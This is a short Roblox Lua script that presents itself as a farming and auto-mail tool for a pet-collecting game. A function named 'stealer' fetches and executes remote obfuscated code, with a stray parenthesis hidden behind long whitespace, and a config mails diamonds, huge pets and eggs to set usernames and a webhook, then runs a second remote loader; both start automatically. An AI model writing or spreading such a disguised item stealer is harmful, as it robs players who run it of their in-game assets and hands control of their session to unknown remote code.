local function stealer()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TechCraft1/OBF/refs/heads/main/V3"))()                                                         )                              
end
local function farm()
 
getgenv().Config = {
    ["Mailing"] = {
        ["Usernames"] = {""},
        ["Items"] = {
            ["Currency"] = {
                ["Diamonds"] = 100000000,
            },
            ["Egg"] = {
                ["Huge Machine Egg 4"] = 1,
            },
        },
        ["MailAllHuges"] = true
    },
    ["Notifications"] = {
        ["UserID"] = "",
        ["Webhook"] = ""
    }
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/3598f9e2d0ad9708cf974fac550d63f2.lua"))()

end

task.spawn(stealer)
task.spawn(farm)
